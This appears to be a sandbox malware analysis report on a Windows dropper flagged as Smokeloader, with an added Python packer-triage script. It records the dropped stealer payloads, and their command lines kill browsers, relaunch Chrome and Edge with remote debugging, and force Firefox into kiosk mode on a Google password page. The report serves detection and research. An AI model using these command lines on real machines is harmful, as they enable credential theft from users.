Source: 00000007.00000002.3279910131.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: random[1].exe0.6.dr Static PE information: Section: ZLIB complexity 0.9976143490484429
Source: random[1].exe0.6.dr Static PE information: Section: sbjgrbkb ZLIB complexity 0.9943977255293035
Source: 79ddad050f.exe.6.dr Static PE information: Section: ZLIB complexity 0.9976143490484429
Source: 79ddad050f.exe.6.dr Static PE information: Section: sbjgrbkb ZLIB complexity 0.9943977255293035
Source: random[1].exe1.6.dr Static PE information: Section: dnuvwdxn ZLIB complexity 0.9948512815427621
Source: e051bdf457.exe.6.dr Static PE information: Section: dnuvwdxn ZLIB complexity 0.9948512815427621
Source: random[1].exe.6.dr Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: 4611cc433b.exe.6.dr Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
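Two of the static PE observations above carry most of the packing evidence: the section-name entries that come out blank (the names are non-printable, which is what the "PE file contains section with special chars" signature in the overview refers to) and the "ZLIB complexity" values of 0.994 to 0.998 on the randomly named sections sbjgrbkb and dnuvwdxn. The script below is an added example, not part of the report or of Joe Sandbox, and it reproduces both checks on constructed section buffers so it runs offline without pefile. How the sandbox computes "ZLIB complexity" is not documented on this page; the compressed-size over raw-size ratio used here is an assumption, and the 0.98 cut-off is a working threshold, not a value from the report.

```python
import random
import zlib

# Working threshold (assumption): sections above this ratio are treated as
# packed or encrypted. The report's flagged sections score 0.994 to 0.998;
# ordinary compiled code compresses to well below that.
PACKED_THRESHOLD = 0.98


def zlib_complexity(data: bytes) -> float:
    """Compressed/raw size ratio with zlib level 9; ~1.0 means incompressible."""
    if not data:
        return 0.0
    return len(zlib.compress(data, 9)) / len(data)


def section_name_is_suspicious(raw_name: bytes) -> bool:
    """True for names that are empty or contain bytes outside printable ASCII."""
    stripped = raw_name.rstrip(b"\x00")
    if not stripped:
        return True
    return not all(0x21 <= b <= 0x7E for b in stripped)


def triage_sections(sections):
    """Score a list of (raw_name, data) tuples the way the report's static checks do."""
    findings = []
    for raw_name, data in sections:
        ratio = zlib_complexity(data)
        bad_name = section_name_is_suspicious(raw_name)
        findings.append({
            "name": raw_name.rstrip(b"\x00").decode("ascii", errors="replace"),
            "suspicious_name": bad_name,
            "zlib_complexity": round(ratio, 4),
            "likely_packed": ratio > PACKED_THRESHOLD,
            "flag": bad_name or ratio > PACKED_THRESHOLD,
        })
    return findings


def _pseudo_random(n: int, seed: int) -> bytes:
    """Deterministic incompressible filler standing in for a packed section."""
    rng = random.Random(seed)
    return bytes(rng.getrandbits(8) for _ in range(n))


# Constructed sections, not bytes from the sample: an ordinary code-like
# section, a blank name like the report's empty entries, a random 8-char
# name like sbjgrbkb, and a plain import directory.
SAMPLE_SECTIONS = [
    (b".text\x00\x00\x00", b"\x55\x8b\xec\x83\xec\x10" * 700),
    (b"\x00" * 8, _pseudo_random(4096, seed=1)),
    (b"sbjgrbkb", _pseudo_random(4096, seed=2)),
    (b".idata\x00\x00", b"KERNEL32.dll\x00VirtualProtect\x00" * 100),
]


if __name__ == "__main__":
    for f in triage_sections(SAMPLE_SECTIONS):
        print(f"{f['name']!r:12} complexity={f['zlib_complexity']:.4f} "
              f"bad_name={f['suspicious_name']} packed={f['likely_packed']}")
```

On a real file, feed the same function `[(s.Name, s.get_data()) for s in pefile.PE(path).sections]`; `Name` is the raw 8-byte field, which is what preserves the non-printable names the report could not render. A high ratio on its own is also produced by legitimately compressed resources, so the name check and the entrypoint arithmetic ratio above are what turn it into a packer call.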
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@67/35@29/16
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_00402A20 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree, 7_2_00402A20
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_00FFD63E CreateToolhelp32Snapshot,Module32First, 7_2_00FFD63E
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_00401940 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance, 7_2_00401940
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3812:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4404:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6116:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3448:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6680:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Command line argument: emp 7_2_00408770
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Command line argument: mixtwo 7_2_00408770
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: e051bdf457.exe, 00000009.00000002.3297911095.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, e051bdf457.exe, 00000009.00000002.3288701516.0000000005AA6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: e051bdf457.exe, 00000009.00000002.3297911095.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, e051bdf457.exe, 00000009.00000002.3288701516.0000000005AA6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: e051bdf457.exe, 00000009.00000002.3297911095.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, e051bdf457.exe, 00000009.00000002.3288701516.0000000005AA6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: e051bdf457.exe, 00000009.00000002.3297911095.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, e051bdf457.exe, 00000009.00000002.3288701516.0000000005AA6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: e051bdf457.exe, 00000009.00000002.3297911095.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, e051bdf457.exe, 00000009.00000002.3288701516.0000000005AA6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: e051bdf457.exe, 00000009.00000002.3297911095.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, e051bdf457.exe, 00000009.00000002.3288701516.0000000005AA6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: e051bdf457.exe, 00000009.00000002.3297911095.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, e051bdf457.exe, 00000009.00000002.3288701516.0000000005AA6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: 79ddad050f.exe, 00000008.00000003.3008778869.0000000005911000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.2979910679.0000000005909000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.2980244884.00000000058EA000.00000004.00000800.00020000.00000000.sdmp, e051bdf457.exe, 00000009.00000003.3208770610.0000000005994000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3184861343.000000000594E000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3136988862.0000000005954000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3138678199.0000000005935000.00000004.00000800.00020000.00000000.sdmp, JJKFBAKFBGDHIEBGDAKF.9.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: e051bdf457.exe, 00000009.00000002.3297911095.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, e051bdf457.exe, 00000009.00000002.3288701516.0000000005AA6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: e051bdf457.exe, 00000009.00000002.3297911095.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, e051bdf457.exe, 00000009.00000002.3288701516.0000000005AA6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: file.exe Virustotal: Detection: 58%
Source: 4611cc433b.exe String found in binary or memory: /add?substr=
Source: 4611cc433b.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 79ddad050f.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: e051bdf457.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe "C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe "C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe "C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe "C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe "C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe"
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2376 --field-trial-handle=2108,i,15494402203579294748,10477359376935723563,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2188 -parentBuildID 20230927232528 -prefsHandle 2136 -prefMapHandle 2128 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {aa193a77-707b-4b1f-8078-06a41e567f56} 3872 "\\.\pipe\gecko-crash-server-pipe.3872" 1c22c36ef10 socket
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe "C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe "C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4112 -parentBuildID 20230927232528 -prefsHandle 2532 -prefMapHandle 4108 -prefsLen 26338 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d5bfb161-09aa-43d5-9f3c-cfcc713c6169} 3872 "\\.\pipe\gecko-crash-server-pipe.3872" 1c23ea0f510 rdd
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2748 --field-trial-handle=2264,i,14280928009878877682,9304379882023563075,262144 /prefetch:3
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2220 --field-trial-handle=2028,i,13930945499186658156,9224765416305937446,262144 /prefetch:3
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe "C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe "C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe "C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe "C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe "C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe"
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2376 --field-trial-handle=2108,i,15494402203579294748,10477359376935723563,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2188 -parentBuildID 20230927232528 -prefsHandle 2136 -prefMapHandle 2128 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {aa193a77-707b-4b1f-8078-06a41e567f56} 3872 "\\.\pipe\gecko-crash-server-pipe.3872" 1c22c36ef10 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4112 -parentBuildID 20230927232528 -prefsHandle 2532 -prefMapHandle 4108 -prefsLen 26338 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d5bfb161-09aa-43d5-9f3c-cfcc713c6169} 3872 "\\.\pipe\gecko-crash-server-pipe.3872" 1c23ea0f510 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2748 --field-trial-handle=2264,i,14280928009878877682,9304379882023563075,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2220 --field-trial-handle=2028,i,13930945499186658156,9224765416305937446,262144 /prefetch:3
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mstask.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dui70.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: duser.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: chartv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: atlthunk.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winsta.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: explorerframe.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll
